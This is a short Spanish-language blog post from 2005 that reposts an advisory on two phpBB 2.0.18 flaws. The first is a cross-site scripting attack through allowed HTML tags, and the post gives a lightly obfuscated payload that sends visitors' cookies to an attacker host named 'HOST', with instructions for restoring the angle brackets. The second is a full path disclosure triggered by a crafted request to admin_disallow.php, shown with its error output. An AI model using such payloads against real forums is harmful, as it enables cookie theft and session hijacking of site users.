ecoestadistica.com

sábado, diciembre 17, 2005

phpBB 2.0.18 XSS and Full Path Disclosure

--- 1. XSS ---
Si en phpbb es permitido etiquetas HTML tales como b,i,u,pre y tenemos en nuestro perfil
"Always allow HTML: YES"
se pueden usar estas etiquetas:

/b c = "" \ " onmouseover="alert('Mousehack')" X=" /b\ H O L A //b
Exploit:

/b c = "" \ "
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X= "/b\ H O L A //b
y asi se obtiene la cookie.

- --- 2. Full Path Disclosure ---
En el archivo admin/admin_disallow.php tenemos:

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

La funcion append_sid() no existe. Y si usted tiene:

register_globals = On
display_errors = On

podemos usar:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

lo que muestra:
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

fuente:securityreason.com

Nota: remplazar las ¨/\¨por las ¨<->¨correspondientes y suprimir los espacios

salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com